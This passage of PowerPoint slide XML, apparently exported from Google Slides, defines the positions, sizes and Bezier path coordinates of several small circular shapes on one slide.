                      <a:pt x="405" y="126"/>
                      <a:pt x="432" y="119"/>
                      <a:pt x="461" y="119"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="488" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="413" y="0"/>
                      <a:pt x="339" y="23"/>
                      <a:pt x="278" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="245"/>
                      <a:pt x="0" y="559"/>
                      <a:pt x="208" y="731"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="281" y="804"/>
                      <a:pt x="358" y="834"/>
                      <a:pt x="431" y="834"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="834"/>
                      <a:pt x="540" y="817"/>
                      <a:pt x="589" y="788"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="589" y="788"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="598" y="796"/>
                      <a:pt x="612" y="800"/>
                      <a:pt x="625" y="800"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="903" y="731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9" name="Google Shape;2409;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2626325" y="995375"/>
                <a:ext cx="23450" cy="20950"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="838" w="938">
                    <a:moveTo>
                      <a:pt x="474" y="120"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="579" y="120"/>
                      <a:pt x="675" y="201"/>
                      <a:pt x="729" y="281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="765" y="350"/>
                      <a:pt x="765" y="420"/>
                      <a:pt x="765" y="489"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="756" y="514"/>
                      <a:pt x="746" y="537"/>
                      <a:pt x="734" y="559"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="734" y="559"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="732" y="559"/>
                      <a:pt x="730" y="559"/>
                      <a:pt x="729" y="559"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="667" y="684"/>
                      <a:pt x="567" y="747"/>
                      <a:pt x="466" y="747"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="400" y="747"/>
                      <a:pt x="334" y="720"/>
                      <a:pt x="278" y="664"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="489"/>
                      <a:pt x="209" y="248"/>
                      <a:pt x="381" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="412" y="126"/>
                      <a:pt x="443" y="120"/>
                      <a:pt x="474" y="120"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="489" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="414" y="0"/>
                      <a:pt x="339" y="23"/>
                      <a:pt x="278" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="248"/>
                      <a:pt x="0" y="559"/>
                      <a:pt x="209" y="734"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="282" y="807"/>
                      <a:pt x="358" y="837"/>
                      <a:pt x="432" y="837"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="837"/>
                      <a:pt x="541" y="820"/>
                      <a:pt x="590" y="790"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="590" y="790"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="599" y="798"/>
                      <a:pt x="612" y="803"/>
                      <a:pt x="626" y="803"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="904" y="767"/>
                      <a:pt x="937" y="420"/>
                      <a:pt x="834" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="766" y="77"/>
                      <a:pt x="626" y="0"/>
                      <a:pt x="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0" name="Google Shape;2410;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2681000" y="116392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76" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="1"/>
                      <a:pt x="1" y="70"/>
                      <a:pt x="1" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="278"/>
                      <a:pt x="70" y="348"/>
                      <a:pt x="176" y="348"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="245" y="348"/>
                      <a:pt x="315" y="278"/>
                      <a:pt x="315" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="70"/>
                      <a:pt x="245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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2713175" y="1264675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103" y="0"/>
                      <a:pt x="0" y="70"/>
                      <a:pt x="0" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="314"/>
                      <a:pt x="103" y="417"/>
                      <a:pt x="209" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="417"/>
                      <a:pt x="417" y="314"/>
                      <a:pt x="417" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="70"/>
                      <a:pt x="312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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2663625" y="1249875"/>
                <a:ext cx="23525" cy="20875"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="835" w="941">
                    <a:moveTo>
                      <a:pt x="478" y="119"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="583" y="119"/>
                      <a:pt x="678" y="199"/>
                      <a:pt x="732" y="281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="765" y="351"/>
                      <a:pt x="765" y="420"/>
                      <a:pt x="765" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="758" y="512"/>
                      <a:pt x="749" y="533"/>
                      <a:pt x="738" y="553"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="738" y="553"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="736" y="555"/>
                      <a:pt x="734" y="557"/>
                      <a:pt x="732" y="559"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="730" y="564"/>
                      <a:pt x="728" y="569"/>
                      <a:pt x="727" y="574"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="727" y="574"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="696" y="625"/>
                      <a:pt x="657" y="667"/>
                      <a:pt x="616" y="708"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="616" y="708"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="574" y="733"/>
                      <a:pt x="527" y="746"/>
                      <a:pt x="479" y="746"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="408" y="746"/>
                      <a:pt x="335" y="718"/>
                      <a:pt x="279" y="662"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="490"/>
                      <a:pt x="209" y="245"/>
                      <a:pt x="384" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="416" y="126"/>
                      <a:pt x="448" y="119"/>
                      <a:pt x="478" y="119"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="506" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="431" y="0"/>
                      <a:pt x="353" y="23"/>
                      <a:pt x="279" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="245"/>
                      <a:pt x="1" y="559"/>
                      <a:pt x="209" y="731"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="282" y="804"/>
                      <a:pt x="359" y="834"/>
                      <a:pt x="433" y="834"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="488" y="834"/>
                      <a:pt x="542" y="817"/>
                      <a:pt x="591" y="788"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="591" y="788"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="600" y="796"/>
                      <a:pt x="613" y="801"/>
                      <a:pt x="626" y="801"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="904" y="731"/>
                      <a:pt x="940" y="420"/>
                      <a:pt x="835" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="768" y="77"/>
                      <a:pt x="643" y="0"/>
                      <a:pt x="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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2814750" y="1231800"/>
                <a:ext cx="23500" cy="21175"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="847" w="940">
                    <a:moveTo>
                      <a:pt x="472" y="127"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="578" y="127"/>
                      <a:pt x="682" y="210"/>
                      <a:pt x="732" y="309"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="765" y="343"/>
                      <a:pt x="765" y="448"/>
                      <a:pt x="765" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="760" y="533"/>
                      <a:pt x="754" y="547"/>
                      <a:pt x="747" y="560"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="747" y="560"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="739" y="561"/>
                      <a:pt x="732" y="570"/>
                      <a:pt x="732" y="587"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="732" y="587"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="697" y="639"/>
                      <a:pt x="648" y="672"/>
                      <a:pt x="600" y="719"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="600" y="719"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="558" y="743"/>
                      <a:pt x="514" y="756"/>
                      <a:pt x="469" y="756"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="402" y="756"/>
                      <a:pt x="335" y="726"/>
                      <a:pt x="279" y="657"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="518"/>
                      <a:pt x="209" y="273"/>
                      <a:pt x="348" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="387" y="140"/>
                      <a:pt x="430" y="127"/>
                      <a:pt x="472" y="127"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="463" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="398" y="1"/>
                      <a:pt x="335" y="20"/>
                      <a:pt x="279" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="240"/>
                      <a:pt x="1" y="551"/>
                      <a:pt x="209" y="760"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="280" y="819"/>
                      <a:pt x="356" y="846"/>
                      <a:pt x="428" y="846"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="486" y="846"/>
                      <a:pt x="542" y="829"/>
                      <a:pt x="592" y="798"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="592" y="798"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="597" y="802"/>
                      <a:pt x="602" y="804"/>
                      <a:pt x="608" y="804"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="613" y="804"/>
                      <a:pt x="620" y="802"/>
                      <a:pt x="626" y="796"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="870" y="760"/>
                      <a:pt x="940" y="412"/>
                      <a:pt x="834" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="740" y="87"/>
                      <a:pt x="599" y="1"/>
                      <a:pt x="4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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3113525" y="1375125"/>
                <a:ext cx="22600" cy="2155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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3361900" y="880350"/>
                <a:ext cx="23500" cy="21325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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3550400" y="589850"/>
                <a:ext cx="13025" cy="11750"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="470" w="521">
                    <a:moveTo>
                      <a:pt x="269" y="76"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="316" y="76"/>
                      <a:pt x="358" y="125"/>
                      <a:pt x="381" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="210"/>
                      <a:pt x="417" y="244"/>
                      <a:pt x="417" y="280"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="349"/>
                      <a:pt x="348" y="383"/>
                      <a:pt x="312" y="419"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="419"/>
                      <a:pt x="312" y="420"/>
                      <a:pt x="312" y="421"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="312" y="421"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="297" y="426"/>
                      <a:pt x="282" y="428"/>
                      <a:pt x="266" y="428"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="225" y="428"/>
                      <a:pt x="182" y="412"/>
                      <a:pt x="139" y="383"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="280"/>
                      <a:pt x="103" y="141"/>
                      <a:pt x="209" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="84"/>
                      <a:pt x="250" y="76"/>
                      <a:pt x="269" y="76"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="249" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="211" y="1"/>
                      <a:pt x="173" y="12"/>
                      <a:pt x="139" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="141"/>
                      <a:pt x="1" y="313"/>
                      <a:pt x="103" y="419"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="455"/>
                      <a:pt x="181" y="469"/>
                      <a:pt x="221" y="469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="253" y="469"/>
                      <a:pt x="284" y="460"/>
                      <a:pt x="314" y="444"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="314" y="444"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="317" y="452"/>
                      <a:pt x="326" y="452"/>
                      <a:pt x="348" y="452"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="419"/>
                      <a:pt x="520" y="244"/>
                      <a:pt x="451" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="404" y="48"/>
                      <a:pt x="327" y="1"/>
                      <a:pt x="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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2611525" y="679325"/>
                <a:ext cx="13100" cy="11750"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="470" w="524">
                    <a:moveTo>
                      <a:pt x="269" y="77"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="316" y="77"/>
                      <a:pt x="359" y="126"/>
                      <a:pt x="384" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="208"/>
                      <a:pt x="417" y="244"/>
                      <a:pt x="417" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="317"/>
                      <a:pt x="395" y="346"/>
                      <a:pt x="369" y="370"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="369" y="370"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="333" y="402"/>
                      <a:pt x="292" y="419"/>
                      <a:pt x="249" y="419"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="213" y="419"/>
                      <a:pt x="177" y="408"/>
                      <a:pt x="139" y="383"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="278"/>
                      <a:pt x="106" y="139"/>
                      <a:pt x="209" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="85"/>
                      <a:pt x="250" y="77"/>
                      <a:pt x="269" y="77"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="253" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="214" y="1"/>
                      <a:pt x="175" y="13"/>
                      <a:pt x="139" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="139"/>
                      <a:pt x="1" y="314"/>
                      <a:pt x="106" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="454"/>
                      <a:pt x="187" y="469"/>
                      <a:pt x="232" y="469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="262" y="469"/>
                      <a:pt x="293" y="462"/>
                      <a:pt x="320" y="449"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="320" y="449"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="453"/>
                      <a:pt x="333" y="453"/>
                      <a:pt x="348" y="453"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="417"/>
                      <a:pt x="523" y="244"/>
                      <a:pt x="454" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="407" y="47"/>
                      <a:pt x="331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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2570750" y="649975"/>
                <a:ext cx="13000" cy="12150"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="486" w="520">
                    <a:moveTo>
                      <a:pt x="269" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="316" y="69"/>
                      <a:pt x="357" y="119"/>
                      <a:pt x="381" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="201"/>
                      <a:pt x="417" y="237"/>
                      <a:pt x="417" y="271"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="340"/>
                      <a:pt x="348" y="376"/>
                      <a:pt x="311" y="410"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="311" y="413"/>
                      <a:pt x="311" y="417"/>
                      <a:pt x="311" y="420"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="311" y="420"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="300" y="423"/>
                      <a:pt x="288" y="424"/>
                      <a:pt x="275" y="424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232" y="424"/>
                      <a:pt x="185" y="407"/>
                      <a:pt x="139" y="376"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="271"/>
                      <a:pt x="103" y="168"/>
                      <a:pt x="209" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="78"/>
                      <a:pt x="249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199" y="1"/>
                      <a:pt x="168" y="9"/>
                      <a:pt x="139" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="132"/>
                      <a:pt x="0" y="307"/>
                      <a:pt x="103" y="410"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="463"/>
                      <a:pt x="189" y="485"/>
                      <a:pt x="233" y="485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="262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0" y="459"/>
                      <a:pt x="322" y="459"/>
                      <a:pt x="324" y="459"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="330" y="459"/>
                      <a:pt x="337" y="455"/>
                      <a:pt x="348" y="446"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="410"/>
                      <a:pt x="520" y="237"/>
                      <a:pt x="450" y="132"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="400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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3485225" y="1249050"/>
                <a:ext cx="10450" cy="10425"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="417" w="418">
                    <a:moveTo>
                      <a:pt x="209" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="0"/>
                      <a:pt x="1" y="106"/>
                      <a:pt x="1" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="347"/>
                      <a:pt x="106" y="417"/>
                      <a:pt x="209" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="417"/>
                      <a:pt x="418" y="347"/>
                      <a:pt x="418" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="106"/>
                      <a:pt x="348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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3353225" y="123605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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2971075" y="1280300"/>
                <a:ext cx="10450" cy="10450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73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3506975" y="1206650"/>
                <a:ext cx="12175" cy="12200"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="488" w="487">
                    <a:moveTo>
                      <a:pt x="256" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="316" y="69"/>
                      <a:pt x="358" y="118"/>
                      <a:pt x="381" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="204"/>
                      <a:pt x="417" y="237"/>
                      <a:pt x="417" y="273"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="290"/>
                      <a:pt x="400" y="305"/>
                      <a:pt x="391" y="318"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="391" y="318"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="388" y="320"/>
                      <a:pt x="385" y="325"/>
                      <a:pt x="383" y="331"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="383" y="331"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="359" y="365"/>
                      <a:pt x="336" y="388"/>
                      <a:pt x="312" y="412"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="413"/>
                      <a:pt x="312" y="414"/>
                      <a:pt x="312" y="415"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="312" y="415"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="296" y="422"/>
                      <a:pt x="278" y="424"/>
                      <a:pt x="260" y="424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="424"/>
                      <a:pt x="171" y="407"/>
                      <a:pt x="139" y="376"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="273"/>
                      <a:pt x="103" y="167"/>
                      <a:pt x="173" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="204" y="78"/>
                      <a:pt x="232" y="69"/>
                      <a:pt x="256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39" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="134"/>
                      <a:pt x="1" y="306"/>
                      <a:pt x="103" y="412"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="465"/>
                      <a:pt x="189" y="488"/>
                      <a:pt x="233" y="488"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="263" y="488"/>
                      <a:pt x="293" y="477"/>
                      <a:pt x="320" y="459"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="320" y="459"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="321" y="460"/>
                      <a:pt x="323" y="460"/>
                      <a:pt x="324" y="460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="330" y="460"/>
                      <a:pt x="337" y="456"/>
                      <a:pt x="348" y="445"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="412"/>
                      <a:pt x="487" y="237"/>
                      <a:pt x="451" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="401" y="58"/>
                      <a:pt x="314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3" name="Google Shape;2423;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3465300" y="1177425"/>
                <a:ext cx="13000" cy="12125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4" name="Google Shape;2424;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3586875" y="511650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7"/>
                      <a:pt x="417" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="212"/>
                      <a:pt x="451" y="245"/>
                      <a:pt x="417" y="281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="302"/>
                      <a:pt x="414" y="320"/>
                      <a:pt x="409" y="335"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="409" y="335"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="380" y="390"/>
                      <a:pt x="322" y="421"/>
                      <a:pt x="266" y="421"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="231" y="421"/>
                      <a:pt x="198" y="409"/>
                      <a:pt x="173" y="384"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="281"/>
                      <a:pt x="140" y="142"/>
                      <a:pt x="209" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="86"/>
                      <a:pt x="253" y="77"/>
                      <a:pt x="276" y="77"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="292" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="251" y="1"/>
                      <a:pt x="210" y="12"/>
                      <a:pt x="173" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="142"/>
                      <a:pt x="1" y="315"/>
                      <a:pt x="140" y="420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="456"/>
                      <a:pt x="215" y="471"/>
                      <a:pt x="255" y="471"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="285" y="471"/>
                      <a:pt x="315" y="463"/>
                      <a:pt x="343" y="448"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="343" y="448"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="346" y="451"/>
                      <a:pt x="348" y="454"/>
                      <a:pt x="348" y="454"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="520" y="420"/>
                      <a:pt x="520" y="245"/>
                      <a:pt x="487" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="442" y="40"/>
                      <a:pt x="368" y="1"/>
                      <a:pt x="2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5" name="Google Shape;2425;p73"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
